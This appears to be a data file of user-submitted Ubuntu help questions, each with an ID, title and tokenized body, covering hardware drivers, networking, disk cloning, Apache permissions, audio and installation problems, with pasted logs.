/usr/bin/unrar-nonfree to provide /usr/bin/unrar ( unrar ) in auto mode
268349	driver hp raid controller b120i	i have a problem with a installation of ubuntu 12.04 server on hp sl4540 with raid controller b120i . ubuntu during installation does not recognize the raid controller , and displays the disk separately . can you tell me how to recognize the controller ? daniel
268352	how to move specific files based on their extensions	i want a command that allows to select specific files based on their extensions to move them to another directory .
268354	where can i find network connection details ?	my internet connections works well , but where can i find it 's configuration files ? i tried to find it here : /etc/network/interfaces /etc/networkmanager but , there is nothing relevant to my eth0 connection . thanks !
268355	sharing audio streams in firefox when using gksudo	my admin user has proprietary information , banking info and internet password database on it 's account . in order to use apps while online , prevent apps from contacting the internet silently , bring up internet passwords safely , i do all that with a firewalled account . yet while doing all the above , in the same account , i bring up firefox to surf the internet . i bring up firefox as a non-admin user using gksudo . for those of you who do n't know gksudo , this all looks like it is being done seemlessly on one desktop , while you can have several users running apps for you ! this is the command : gksudo -u internet /usr/bin/firefox & here is the problem : padevchooser has been refused to be fixed , which allowed this audio sharing to happen with a simple check of a box . i can not hear the audio in firefox while admin runs firefox as another user . is there some other way i can set things up manually so the sound is always played when user : internet plays videos in firefox ?
268357	how do i install ubuntu onto a laptop with a 32gb ssd drive a 500gb hard drive ? i want to take advantage of the quick boot option	some people have suggested symlinking , but i have no idea how to accomplish that ( despite googling for quite a while ) . someone recommended using these steps : http : //imgur.com/a/hnmdn specs : 14 '' hp 4t-1000 sleekbook 4gb ram 500gb hard drive 32gb ssd any help is appreciated . thanks .
268359	editing sources.list	i have edited the sources.list file in order to install a distribution of ns2 . however when i run sudo apt-get update command it gives a 404 error that the package could not be located . looking at the link , it directs to 'binary-i386 ' , however inspecting the link i need it to direct to 'binary-amd64 ' . how could i change this ? the link in sources.list only contains /precise contrib at the end , the binary-i386 is inputted automatically by ubuntu .
268361	how do i run a py file with pico in the terminal ?	i got this when i tried to open a .py file on the terminal line i edited in pico : lightning @ rigel5 : ~ $ ./hello.py bash : ./hello.py : permission denied how can i easily open a .py file from the pico editor in the terminal and run it in the python interpreter ?
268366	how to fix hdd after doing a dd cloning	so yesterday i received a hdd that was used for cloning , the whole thing went like this : an hdd of 1tb which had 120gb used was resized to 140gb . after that they did the following : sudo dd if=/dev/sdb of=/dev/sdc where sdb is the 1tb hdd that was resized to 120gb ( the rest was left empty/unused as i was told ) . sdc is a new 160gb hdd . so they cloned the 1tb to a 140gb because apparently , they tried to copy the partitions before with gparted ( they copied sdb1 and sdb2 to sdc1 and sdc2 respectively . but this did not work even after activating the boot flag on the disk ) . now , they also said that after starting the cloning process , obviously after getting to the max real size of the 160gb hdd , dd gave an error . am guessing a read/write error since there was no more blocks to write to since there was no more space left ( remember , they are copying 1tb total space to 160gb . ) so they pressed ctrl+c to cancel the process . they went to test the system and yes the system showed the grub boot menu and could select from there any of the kernel images but the system did not correctly boot . at least it did not get to loading lightdm or the unity desktop . what i did was just do a fsck and found the following error : cyrex @ cyrex : ~ $ sudo fsck /dev/sdb2 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) the filesystem size ( according to the superblock ) is 39046656 blocks the physical size of the device is 36136448 blocks either the superblock or the partition table is likely to be corrupt ! so my idea is , i either do some kind of superblock reset to tell it the correct amount of blocks ( or lower then resize ) or i change the filesystem to read the actual amount of blocks . so how can i correct this state of how the hdd was left in ?
268374	no logical name for wireless adapter ubuntu server 12.04	i just installed ubuntu server 12.04 after formatting my windows hard drive , because i no longer need the desktop so i will be using it a server . i can not connect to the internet via wireless router , and while following some instructions on a forum , i noticed that when using the command : lshw -c network my wireless adapter is seen , but does not have a logical name . is there a way to give my wireless adapter a logical name , or a different way to solve the problem ? i am not able to run an ethernet wire from my router to my room at the moment so i have to find out a way to connect to the internet with the wireless adapter .
268377	ubuntu uninstall problem	i installed my ubuntu 12.10 using wubi.exe . my laptop crashed and i decided to re-install my windows . now , i can not uninstall wbuntu 12.10 using the control panel in windows . i have already deleted the folders of ubuntu 12.10 from my local disk from where its data is placed . i thought that by using this deletion method , ubuntu will not show whenever i reboot , but it is still there . can you please give advise on how i will handle this uninstall problem ?
268380	why is evolution mail client getting parsing errors when hyperlinking ?	today i noticed that an email i tried to send was n't getting sent because when i click the hyperlink email address , evolution mail pastes an error by switching letters around in the destination field . also , an attachment with the suffix .vcf fails to load and cant be read . any thoughts on these errors ? the error report i get is the internal error one which says restart and if the problem continues , yadda yadda
268387	volume control indicator is not working	when i try to control the volume from the indicator , nothing happens . i have to individually set each application 's volume ( like audacious or totem ) from their controls or use the hard controls . i have usb speakers . also , i can not use the playback controls for audacious .
268388	problems booting in recovery mode with ubuntu 12.10	this is what i get when i boot into recoverymode : udevd [ 369 ] : timeout : killing '/sbin/modprobe/ -bv pci : v00001002d00006738sv0000174 bsd0000174bbc03sc00i00 ' [ 374 ] it shows multiple times .
268393	how to install ubuntu on dell 5521	how to install ubuntu on dell 5521 in which windows 8 is already factory installed . i want to keep windows 8 also . in my another windows 7 pc i installed ubuntu with a help of wubi installer that works fine but not working on the dell 5521 .
268397	unable to get audio output from paired bluetooth device	hy frnds , i am using byte dm5710bt bluetooth headset which is working very fine in windows 7 . but in ubuntu12.10 i had paired it , and made sure it is connected . but still i am not getting audio from my device instead in-built speaker of laptop is giving audio . could anyone please help me with how to use bluetooth headset in ubuntu . thanks .
268398	create a fat32 partition on usb	edit : magic , friend formatted it to fat32 . works now . i am trying to create a bootable usb stick to install windows7.. here is my problem : and i have real trouble finding a tutorial to do what the prompt wants .
268399	will `sudo reboot` on kvm host gracefully poweroff guest vms ?	currently i manually poweroff each kvm guest before rebooting the host . however , this is getting old and now i am up to about 20 guest machines . can i trust ubuntu server 12.04 to do the right thing and hold off on completing a shutdown until the last kvm client is off ? alternatively is there an easier way to shut all the guests off gracefully ?
268402	how to let ubuntu ignore a internal hard-drive when start up ?	i am dual-booting ubuntu ( 12.10 ) and windows on different hard drives in my laptop . for battery life and noise issue , it is possible for me to ignore the windows drive and prevent it from being mounted ? i tried to look up /etc/fstab but only found the drive for ubuntu ... is it possible to totally disable the windows drive on grub ( before the system boots ) ? ( i use mbr for windows and choosing system by selecting drive )
268404	touch pad or mouse not working on launcher and top panel	i am using ubuntu 12.04 and everything was working fine but suddenly the top panel and side bar ( launcher ) has stop responding to mouse or my touch pad . i can bring the dashboard using keyboard shortcut but ca n't type anything or click on anything . same problem is with top panel . for eg . i ca n't click and open the menu on the top right corner to logout or shutdown , for that i have to press power button on my laptop or press alt + f4 to do the task . i tried to find this problem online but did n't found one anywhere ? please help me to solve this problem . thank you in advance .
268405	dell studio slim 540 not installing ubuntu 12.10	i offered to install ubuntu on my uncles computer because windows is failing , the computer has the specs of a intel 2 quad processor,15 gigs of ram and 1 terabyte of hdd , i loaded the os through flashdrive and hit install , after a few seconds , it was installing and then shortly after it said that the installation has a bug and or is corrupted then says the computer might have a faulty hard drive or disk drive , then i went to see if i could just install the os through the wubi.exe and i couldnt because linux erased the whole harddrive , i dont have windows anymore , and it wont install linux , is there any possible way around this ? : '' (
268409	window is hidden but process is running	how may i restore the windows for a given pid ? it would be useful in some situations where the window of a certain program disappears ( happens to me sometimes ) . for example , every time when i 'm heading to close hexchat , it shows a dialog for confirmation . if i click cancel , the window is gone anyway , but the process continues running in the background . ( i can pgrep it 's id ) . is it possible to restore the window , given i know the pid ?
268410	unable to connect to localhost after installing apache	hi unable to connect to localhost after installing apache checked with https//localhost , https//127.0.1.1 and https//127.0.1.1 please find the logs below avinash @ ubuntu : /etc/init.d $ sudo service apache2 restart [ sudo ] password for avinash : * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername avinash @ ubuntu : /etc/init.d $ ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:54 : d4 : d1 inet addr:192.168.56.130 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe54 : d4d1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14746 errors:0 dropped:0 overruns:0 frame:0 tx packets:7681 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17657949 ( 17.6 mb ) tx bytes:749463 ( 749.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:172 errors:0 dropped:0 overruns:0 frame:0 tx packets:172 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9920 ( 9.9 kb ) tx bytes:9920 ( 9.9 kb )
268411	authentication issue after wubi installation	i am unable to log-in to ubuntu with the username/password combination i gave on wubi at the time of installation ( incorrect username/password error ) . this happened twice ; the first time i really thought i forgot the password and/or the username and ran wubi again but it happened the second time too . guest access works fine , and strangely while the wubi installer says i 'm about to install 12.04 , it actually ends up downloading and installing 13.04 . any ideas would be appreciated .
268415	how to make ubuntu server fit into a vmware window ?	i installed ubuntu server edition in vmware 7.0.1 . i am using latest version of ubuntu . ubuntu is not filling into complete vmware window . how can i fix this ?
268423	my wireless network continously asking for authentication even when i give correct security key	i have a bcm4313 on my laptop with ubuntu 12.04 . initially before upgrading to 12.04 my wireless used to work fine . but after that its connecting sometimes and sometimes i cant find my network in wireless networks . i should go for connect to hidden wireless networks and search for my network ( wvwn ) then its asking for authentication repeatedly and not getting connected even if i key in the right security . here i am pasting log generated on pressing the connect button . sricharan @ sricharan-laptop : ~ $ sudo tail -f -n0 /var/log/syslog mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) starting connection 'bheemarslink' mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0/wireless ) : access point 'bheemarslink ' has security , but secrets are required . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0/wireless ) : connection 'bheemarslink ' has security , and secrets exist . no new secrets needed . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > config : added 'ssid ' value 'bheemarslink' mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > config : added 'scan_ssid ' value '1' mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > config : added 'psk ' value ' < omitted > ' mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > config : set interface ap_scan to 1 mar 16 12:56:43 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning mar 16 12:57:44 sricharan-laptop networkmanager [ 1239 ] : < warn > activation ( wlan0/wireless ) : association took too long . mar 16 12:57:44 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] mar 16 12:57:44 sricharan-laptop networkmanager [ 1239 ] : < warn > activation ( wlan0/wireless ) : asking for new secrets mar 16 12:57:44 sricharan-laptop networkmanager [ 1239 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . mar 16 12:57:44 sricharan-laptop networkmanager [ 1239 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . mar 16 12:57:45 sricharan-laptop networkmanager [ 1239 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > inactive can any one suggest solution for me ?
268425	what alternatives do i have to correctly open ( for read-only purposes ) a docx file ?	i want to know how can i open this .docx file ( read-only ) in such a way that it looks the same as in skydrive or microsoft office 2007+ i 'm on ubuntu 12.04 amd64 . so far i 've tried with google drive and libreoffice 4 without any luck .
268427	installing software terminated in the middle	i am new to ubuntu and i was trying to install the restricted extras using this command sudo apt-get install ubuntu-restricted-extras in the end there was a licence aggrement page which it asked me to agree but the ok button did not get selected even when i clicked on it so i closed the terminal but now when i start the terminal and try to install other softwares it is not allowing me to install and it is giving me the following error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? please tell me what to do now . can i resume where i left the installation ?
268432	acer w500 touchscreen events	i have very strange behavior of my touchscreen in gnome shell or unity i am unable to click with it on unity panel or gnome shell interface . but i can iteract with gtk+ windows , if i open gnome shell with hardware button all gnome shell interface became clickable , until i close it/ with xev and xinput utilities i found that in xev buttonpress event is not generated by touchscreen but in xinput all events showed correctly i post my problem in many places but no answer for now may be not direct answer , but directions how to find the exact source of the problem will be very helpful
268433	decode multiple h264 streams on pandaboard	my goal is to decode multiple h264 streams using pandaboard device ( ti 4430 ) . i was able to install successfully ubuntu 11.10 omap4 version and install hadrware decoding drivers ( ubuntu-omap4-extras package ) . i am testing streams with the following command : gst-launch -v playbin2 uri= '' rtsp : //address_here '' when i parsed gst-launch logs , i found that it uses `` ducatih264dec '' filter , so it is working absolutelly correct on the graphics co-processor . cpu utilization is about 10 % . i was able to view without any problems an 1080p h264 stream with bitrate ~8000 mbit . but , if i try to run multiple streams in parallel , playback hangs after 30 sec , and viewing becomes possible only after reboot . to sum up : running one stream is fine running two streams is fine only for 240p quality running three streams is impossible totally have anybody experienced successful decoding of mutiple streams on omap4 version of ubuntu on pandaboard device ? which steps it took to set-up such a robust system ?
268437	is ndisgtk running correctly ?	i reported a bug , which was marked as a duplicate of another bug , and then a duplicate of another bug -- which is fine , i think it is a duplicate . first off , the architecture is different . the original bug , # 1023645 , is architecture : amd64 while the bug i reported is architecture : i386 and so it i feel i should question as to whether it should be separate . in any event , what should i do in order to use ndiswrapper ? it looks to me that ndiswrapper is installed : thufir @ dur : ~ $ thufir @ dur : ~ $ aptitude search ndiswrapper i ndiswrapper-common - common scripts required to use the utilities i ndiswrapper-dkms - source for the ndiswrapper linux kernel modul v ndiswrapper-modules-1.9 - i ndiswrapper-source - source for the ndiswrapper linux kernel modul i ndiswrapper-utils-1.9 - userspace utilities for the ndiswrapper linux thufir @ dur : ~ $ i 'm only using xfce , but seem able to bring up ndisgtk as so : thufir @ dur : ~ $ thufir @ dur : ~ $ sudo ndisgtk ( ndisgtk:4797 ) : libglade-warning ** : could not load support for `gnome ' : libgnome.so : can not open shared object file : no such file or directory /usr/sbin/ndisgtk:127 : gtkwarning : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.zz68tw ' : no such file or directory gtk.main ( ) /usr/sbin/ndisgtk:127 : gtkwarning : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory gtk.main ( ) thufir @ dur : ~ $ does the fact that ndisgtk runs indicate that everything is ok ?
268442	unable to connect bluetooth headset	when i connect bluetooth headset byte ( dm5710bt ) i do n't get any sound . in terminal i type lspci -vnn and get following details . what 's wrong ? 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : f0000000-f10fffff prefetchable memory behind bridge : 00000000c0000000-00000000d1ffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 50 memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 48 memory at f1c05000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device [ 1028:050e ] flags : bus master , medium devsel , latency 0 , irq 16 memory at f1c0a000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 51 memory at f1c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : f1b00000-f1bfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 memory behind bridge : f1a00000-f1afffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 memory behind bridge : f1900000-f19fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 i/o behind bridge : 00002000-00002fff prefetchable memory behind bridge : 00000000f1800000-00000000f18fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device [ 1028:050e ] flags : bus master , medium devsel , latency 0 , irq 23 memory at f1c09000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 05 ) subsystem : dell device [ 1028:050e ] flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : lpc_ich 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device [ 1028:050e ] flags : bus master , 66mhz , medium devsel , latency 0 , irq 41 i/o ports at 4088 [ size=8 ] i/o ports at 4094 [ size=4 ] i/o ports at 4080 [ size=8 ] i/o ports at 4090 [ size=4 ] i/o ports at 4060 [ size=32 ] memory at f1c08000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) subsystem : dell device [ 1028:050e ] flags : medium devsel , irq 10 memory at f1c04000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at efa0 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df4 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 16 memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 3000 [ size=128 ] expansion rom at f1000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau kernel modules : nouveau , nvidiafb 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn [ 8086:5325 ] flags : bus master , fast devsel , latency 0 , irq 49 memory at f1b00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi kernel modules : iwlwifi 04:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 19 memory at f1a00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : xhci_hcd 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : dell device [ 1028:050e ] flags : bus master , fast devsel , latency 0 , irq 47 i/o ports at 2000 [ size=256 ] memory at f1804000 ( 64-bit , prefetchable ) [ size=4k ] memory at f1800000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169
268443	ubuntu 12.04 not recognizing the graphic card	i just installed an ubuntu 12.04 64bit on my laptop which has this graphic card : nvidia geforce 610m 2gb but the output of lspci | grep vga is this : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev a1 ) i 've use another laptop like this and it should show the model of the gpu not controllers . does anybody know how i can fix this ?
268445	how can i uninstall ubuntu in order to install windows 7 ?	i ca n't work out how to do it . when i try to use my windows installation disk , it wo n't even show a setup menu . i installed ubuntu via a usb stick , and it is the only os on my hard drive .
268449	how to make g++ find my header file ?	i tried to compile my .cpp using g++ . i wrote this in the terminal : g++ documents/cpp/demo.cpp -o documents/cpp/demo i had included conio.h , but somehow it does not recognise it and gives an error . otherwise , a simple hello world program using stdio.h works fine . i wanted to ask how i can find the header files which are available ( they would be stored somewhere , right ? ) . is there any other software which has a gui ( like the borland compilers on windows ) and can handle things well ? thank you in advance !
268450	inner object properties are not shown in qt creator in debugging mode	i 'm using qt creator 2.6.82 on ubuntu 12.10 . i wanted to figure out if some properties are correctly set , but i ca n't see them . this is the deepest i can get ( i ca n't even open the qobject node ) and i could n't find anything in the settings that would fix that . it worked fine on debian with qt 4.8 . does it have something to do with licencing ? or am i just missing something very basic ?
268451	flashback does n't work after latest 12.04 ubuntu update	i have the latest 12.04 version of ubuntu . yesterday i installed the latest updates and right away i got this message : 'the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . ' i then tried to install the plugin using the apt-get command and here are the results : ( ... /flashplugin-installer_11.2.202.275ubuntu0.12.10.1_amd64.deb から ) flashplugin-installer を展開しています ... update-notifier-common のトリガを処理しています ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.275.orig.tar.gz traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 93 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 239 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 344 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 958 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 818 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 780 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 761 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 571 , in create_connection raise err ioerror : [ errno socket error ] [ errno 101 ] network is unreachable flashplugin-installer ( 11.2.202.275ubuntu0.12.10.1 ) を設定しています when i go to youtube , there 's a message in the right upper corner about installing the missing plugins . when i click on it , there 's another message saying that firefox is checking for the missing plugins but then nothing really happens . it is kind of weird since some flash videos on youtube work and some do not . what could be wrong ? thank you .
268457	how to mount/format ipod classic that stopped being accessible after an interrupted banshee sync ?	i am running 12.04 lts and i have an ipod classic . i had it repaired with a non-apple store . it was at first detected by my machine running banshee and syncing was in progress . however , due to some negligence on my part , i accidentally unplugged it while it was in progress . now the machine will not read it and it says that the ipod is full and has no space . it will not read from a mac either . here is the read out from lsusb : bus 001 device 011 : id 05ac:1261 apple , inc. ipod classic can i mount and format it somehow ? resetting does not work .
268458	how to make the touchpad work on acer travelmate p243 ?	i 've installed ubuntu 12.04 ( 32-bit ) on my laptop ( acer travelmate p243 ) and did n't manage to make the touchpad work . it is detected : xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] it is working in windows 7 setup . it is active - at least the checkbox in dconf-editor : setting -- > org -- > gnome -- > settings-daemon -- > peripherals -- > touchpad is set . please help !
268460	can not access directory in /var/www/ : permission denied	forbidden you do n't have permission to access /celsium/index.php on this server . the above text is shown when i try to access the directory made in /var/www . the directory is /var/www/celsium/index/php . i can access the files in /var/www/ the directories made in /var/www ca n't viewed in localhost .
268461	how do i install brother mfc7340 - ubuntu 12.10	i have a brother mfc7340 which i have installed , but it does n't respond and when it did it just spitted out blank pages . can anyone help please and relatively new to ubuntu . i have ubuntu 12.10 on dual with windows xp .
268466	login on local terminal without password	i have a virtual guest of ubuntu on a kvm machine , i 've setup the machine so i can type virsh console and be dropped into a console . i realise the security considerations here , but is it possible to set the guest up so that if a user connects via console they are automatically root without having to type in any password . however this is only for serial console and not for ssh or remote access . this is n't really a kvm question but just a system setup , the console has been setup as a device on /dev/ttys0 .
